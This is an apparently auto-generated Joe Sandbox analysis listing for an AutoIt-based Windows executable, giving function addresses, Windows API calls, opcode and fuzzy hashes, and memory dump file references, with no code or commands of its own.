                                          • Instruction ID: c458747ba9b2b48e2356c8e0afab58258532de3e24bb40031e70129b58607ff6
                                          • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                          • Instruction Fuzzy Hash: 07620A30A14258DBEB28CFA4C851BDEB376EF58300F1091A9D60DEB394E7759E81CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$CurrentFreeLibraryTerminate
                                          • String ID:
                                          • API String ID: 146820519-0
                                          • Opcode ID: cefc9f8ec62254a7b61987cdb4575f1e97562b0b8c9487f77737716450db8657
                                          • Instruction ID: 6ee3f3d604d3f336667d1f60f7af9586a280c574692c8c4f180b0a73a8215c48
                                          • Opcode Fuzzy Hash: cefc9f8ec62254a7b61987cdb4575f1e97562b0b8c9487f77737716450db8657
                                          • Instruction Fuzzy Hash: 05127D71A083419FC714DF28C684B5ABBE1FF84318F14995DE899AB352CB31ED46CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E410F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E41BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E41BF4
                                            • Part of subcall function 00E41BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E41BFC
                                            • Part of subcall function 00E41BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E41C07
                                            • Part of subcall function 00E41BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E41C12
                                            • Part of subcall function 00E41BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E41C1A
                                            • Part of subcall function 00E41BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E41C22
                                            • Part of subcall function 00E41B4A: RegisterWindowMessageW.USER32(00000004,?,00E412C4), ref: 00E41BA2
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00E4136A
                                          • OleInitialize.OLE32 ref: 00E41388
                                          • CloseHandle.KERNEL32(00000000), ref: 00E824AB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                          • String ID:
                                          • API String ID: 1986988660-0
                                          • Opcode ID: 51fdbf469deb4705ee23785a84b54887528a7636cd9c92a4c6d61db35956947d
                                          • Instruction ID: e58b9c5764e5d69171d959777851b6670a220d84d5ebc0884d94e53f86604e78
                                          • Opcode Fuzzy Hash: 51fdbf469deb4705ee23785a84b54887528a7636cd9c92a4c6d61db35956947d
                                          • Instruction Fuzzy Hash: A471BBB49122098EC784DF7ABD556D53AE2FBC939431AD22ED30AE7362EB304445EF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E454C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointerEx.KERNELBASE ref: 00E4556D
                                          • SetFilePointerEx.KERNELBASE ref: 00E4557D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: e8d2b7316a8f1641fc3d7f1f33b5c96068a679930f610aa262a345534a71127c
                                          • Instruction ID: 1d128a05ef3035d31bf8fa5ca7de2b67e463eb14564812b9b77eecf9a4254f21
                                          • Opcode Fuzzy Hash: e8d2b7316a8f1641fc3d7f1f33b5c96068a679930f610aa262a345534a71127c
                                          • Instruction Fuzzy Hash: 28316072A00609FFDB14CF28D880BADB7B6FB48714F149229E919A7241D775FD94CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E786AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseErrorHandleLast__dosmaperr
                                          • String ID:
                                          • API String ID: 2583163307-0
                                          • Opcode ID: c5426aafde7d1d654531b9aab214a32cd39bbbf51854d5e806b63d8a3c519b17
                                          • Instruction ID: fe38efb050363c26f1b2fad7727bbeae81b59a9e53679cfb4daf2084a1714933
                                          • Opcode Fuzzy Hash: c5426aafde7d1d654531b9aab214a32cd39bbbf51854d5e806b63d8a3c519b17
                                          • Instruction Fuzzy Hash: 31016F33A4512036D62462746A4E77E27868BA177CF35E11AF80CFB0E2DEE08C818650
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00EB2FF2
                                          • SetFileTime.KERNELBASE ref: 00EB3006
                                          • CloseHandle.KERNEL32(00000000), ref: 00EB300D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
                                          • String ID:
                                          • API String ID: 3397143404-0
                                          • Opcode ID: dd17df7fb8a3c211542d50dec1398a05777845338166e86a4654eedda1fe23e9
                                          • Instruction ID: 5b3eee4f605aa078f297602ce132e0eb851112fee2c672be7878cdb81cccc6d5
                                          • Opcode Fuzzy Hash: dd17df7fb8a3c211542d50dec1398a05777845338166e86a4654eedda1fe23e9
                                          • Instruction Fuzzy Hash: 81E086322822217BD6302766BC0EFCB3B2CDB8ABB5F204221F759750D186A0150582A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E51310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                          Download Yara Rule
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 00E517F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer
                                          • String ID: CALL
                                          • API String ID: 1385522511-4196123274
                                          • Opcode ID: 92d3093bc79a1a9a4e2f539046148784b4e433901cd3f4345ac02ef2edfec284
                                          • Instruction ID: d893a3b025ce0fca4bc95f69c8c699fda6fef6558946729a3cc167d1fae87b6f
                                          • Opcode Fuzzy Hash: 92d3093bc79a1a9a4e2f539046148784b4e433901cd3f4345ac02ef2edfec284
                                          • Instruction Fuzzy Hash: C922AD706083019FC714DF14C481B6ABBF1BF89315F14A99EF896AB362D771E949CB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcslen.LIBCMT ref: 00EB6F6B
                                            • Part of subcall function 00E44ECB: LoadLibraryExW.KERNELBASE ref: 00E44EFD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LibraryLoad_wcslen
                                          • String ID: >>>AUTOIT SCRIPT<<<
                                          • API String ID: 3312870042-2806939583
                                          • Opcode ID: c5e64358324553f3081e8f3630809e29475b698217436efbb62aaeaabcd58338
                                          • Instruction ID: 8e6ea41566822ccb230a1c69bc379e7128c06fb38526cb0d8bcd48bcfaa465b4
                                          • Opcode Fuzzy Hash: c5e64358324553f3081e8f3630809e29475b698217436efbb62aaeaabcd58338
                                          • Instruction Fuzzy Hash: 7DB1B3716082018FCB14EF24D4919AFB7E5EFD4314F04582DF496AB6A2EB30ED49CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7C827 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Info
                                          • String ID:
                                          • API String ID: 1807457897-3916222277
                                          • Opcode ID: 0370a47310f0d1e7546ffb6b5119a3cdc4b8565640cc153503b2bcc34f45f1c7
                                          • Instruction ID: 4ca42ae39904a3a40c5c24c5ff6002adc79b67b0762dae127c34739a8b0a6654
                                          • Opcode Fuzzy Hash: 0370a47310f0d1e7546ffb6b5119a3cdc4b8565640cc153503b2bcc34f45f1c7
                                          • Instruction Fuzzy Hash: 4D4159705042889ADB25CE64CC84BFABBFDEB85308F2454ECE58EA7142D234AA45DF21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E42DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetOpenFileNameW.COMDLG32(?), ref: 00E82C8C
                                            • Part of subcall function 00E43AA2: GetFullPathNameW.KERNEL32 ref: 00E43AC2
                                            • Part of subcall function 00E42DA5: GetLongPathNameW.KERNELBASE ref: 00E42DC4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Name$Path$FileFullLongOpen
                                          • String ID: X
                                          • API String ID: 779396738-3081909835
                                          • Opcode ID: 5bd599c2ef7b0e7f46c24ab7bdd5236930f9410afb4e9d29cfc7ff0546909ece
                                          • Instruction ID: 479c6942daa0bfd4bce743bbbd05c64fa646392d567b3b362ad9662845bf41e6
                                          • Opcode Fuzzy Hash: 5bd599c2ef7b0e7f46c24ab7bdd5236930f9410afb4e9d29cfc7ff0546909ece
                                          • Instruction Fuzzy Hash: 4921C370A002589FCB01EF94D805BEE7BFCAF48304F009059E609F7281DBB45A49DF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: __fread_nolock
                                          • String ID: EA06
                                          • API String ID: 2638373210-3962188686
                                          • Opcode ID: b76c8444f443f7f16130ec82db5bfd9fef11c38c0e7a723745aa74c1a3832eb9
                                          • Instruction ID: 193f081664b204fe1c6ffcb034da4e829d6a2c78308fa8be2c5bcf9299748f7e
                                          • Opcode Fuzzy Hash: b76c8444f443f7f16130ec82db5bfd9fef11c38c0e7a723745aa74c1a3832eb9
                                          • Instruction Fuzzy Hash: CA01F5729442287EDF28C7A8CC16EEEBBF89F05301F00459EE252E21C1E4B4E6088B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E73467 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: String
                                          • String ID: LCMapStringEx
                                          • API String ID: 2568140703-3893581201
                                          • Opcode ID: 4d0ad23fb2e99439f5fa65a7dd6860ae9ead8c63714269cca0410e0f3cdf4844
                                          • Instruction ID: eb1c37c3ee495f54c789ab5c46fcb3802783ad50d6aadb1c5f25eb7f70fd587a
                                          • Opcode Fuzzy Hash: 4d0ad23fb2e99439f5fa65a7dd6860ae9ead8c63714269cca0410e0f3cdf4844
                                          • Instruction Fuzzy Hash: 0F01293264120DBBCF165F91DD01DEE3FA6EF08750F008159FE1875160C6769930EB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E73162 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Alloc
                                          • String ID: FlsAlloc
                                          • API String ID: 2773662609-671089009
                                          • Opcode ID: b136439f276fab5d3694c3d4881020714ccae157bac70639a9cd7f0f3c4f5a07
                                          • Instruction ID: 3e1d2a74603a0138ea968aea8af7d6b4ac33be484355e461cab49d2cc730f5b5
                                          • Opcode Fuzzy Hash: b136439f276fab5d3694c3d4881020714ccae157bac70639a9cd7f0f3c4f5a07
                                          • Instruction Fuzzy Hash: 17E0553178231CABD300AFA2AC02E6EBB98EF48B50B004159FF087B250DDB01F00E6C6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E63600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • try_get_function.LIBVCRUNTIME ref: 00E63615
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: try_get_function
                                          • String ID: FlsAlloc
                                          • API String ID: 2742660187-671089009
                                          • Opcode ID: 702c6d800d12f76be3e42d7a5d688c5ded26c325ec93802654387019d69692d3
                                          • Instruction ID: 9789de47c68e4a9ba7cc75e406ea764c3a05e0fa2f2438873291818e3b5716a3
                                          • Opcode Fuzzy Hash: 702c6d800d12f76be3e42d7a5d688c5ded26c325ec93802654387019d69692d3
                                          • Instruction Fuzzy Hash: 8FD0123278532467D6106BA5BD06AA9BB45DF01BE6F041073FD0A76391D5514A1196C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7CB7C Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E7C74F: GetOEMCP.KERNEL32 ref: 00E7C77A
                                          • IsValidCodePage.KERNEL32 ref: 00E7CBF0
                                          • GetCPInfo.KERNEL32(00000000,00E7CA1D), ref: 00E7CC03
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID:
                                          • API String ID: 546120528-0
                                          • Opcode ID: f90861a9baf5859a545024714a52c76fd6fb9eadfb5d1c8aefaa8c5bd1cc551c
                                          • Instruction ID: 70fb95b585c2bc3a53cab09c7d27119694f87231eb52e7020393c719f633d26d
                                          • Opcode Fuzzy Hash: f90861a9baf5859a545024714a52c76fd6fb9eadfb5d1c8aefaa8c5bd1cc551c
                                          • Instruction Fuzzy Hash: EB513170A002069FDB26CF75D8816BAFBE8EF41304F34E16ED19EAA251D7349942DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7C9BB Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E72D74: GetLastError.KERNEL32 ref: 00E72D78
                                            • Part of subcall function 00E72D74: _free.LIBCMT ref: 00E72DAB
                                            • Part of subcall function 00E72D74: SetLastError.KERNEL32(00000000,?,?,?,?,00E6E6D1,?,00F08A48,00000010,00E44F4A,?,?,00000000,00E83CD6), ref: 00E72DEC
                                            • Part of subcall function 00E72D74: _abort.LIBCMT ref: 00E72DF2
                                            • Part of subcall function 00E7CADA: _abort.LIBCMT ref: 00E7CB0C
                                            • Part of subcall function 00E7CADA: _free.LIBCMT ref: 00E7CB40
                                            • Part of subcall function 00E7C74F: GetOEMCP.KERNEL32 ref: 00E7C77A
                                          • _free.LIBCMT ref: 00E7CA33
                                          • _free.LIBCMT ref: 00E7CA69
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$ErrorLast_abort
                                          • String ID:
                                          • API String ID: 2991157371-0
                                          • Opcode ID: e7898120e260857842384b376bc8d8f0393db7a5aba7ce52cc0bfc8189b23804
                                          • Instruction ID: c1898b24f862fd225e73b3a00fcbf2b88065360df0a0600caef09cafe01129a6
                                          • Opcode Fuzzy Hash: e7898120e260857842384b376bc8d8f0393db7a5aba7ce52cc0bfc8189b23804
                                          • Instruction Fuzzy Hash: 7F31B43190420CAFDB10EBA8D441B99B7F9EF40325F35919DE90DBB2A2EB319E41DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E72FD7 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetProcAddress.KERNEL32 ref: 00E73037
                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E73044
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AddressProc__crt_fast_encode_pointer
                                          • String ID:
                                          • API String ID: 2279764990-0
                                          • Opcode ID: d068030127168a234b9d5fcf4597232f38fa725d4a8c9b26af8ac68c8331eac6
                                          • Instruction ID: aa8e019ac098b333d652aaae7af7730e76906337178d7e650a4ac758b69e0d26
                                          • Opcode Fuzzy Hash: d068030127168a234b9d5fcf4597232f38fa725d4a8c9b26af8ac68c8331eac6
                                          • Instruction Fuzzy Hash: C2110633A001259FDB719F39EC4099A7395AB807647169220FD19FB258DB31EE01F7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E45745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E45773
                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00E84052
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateFile
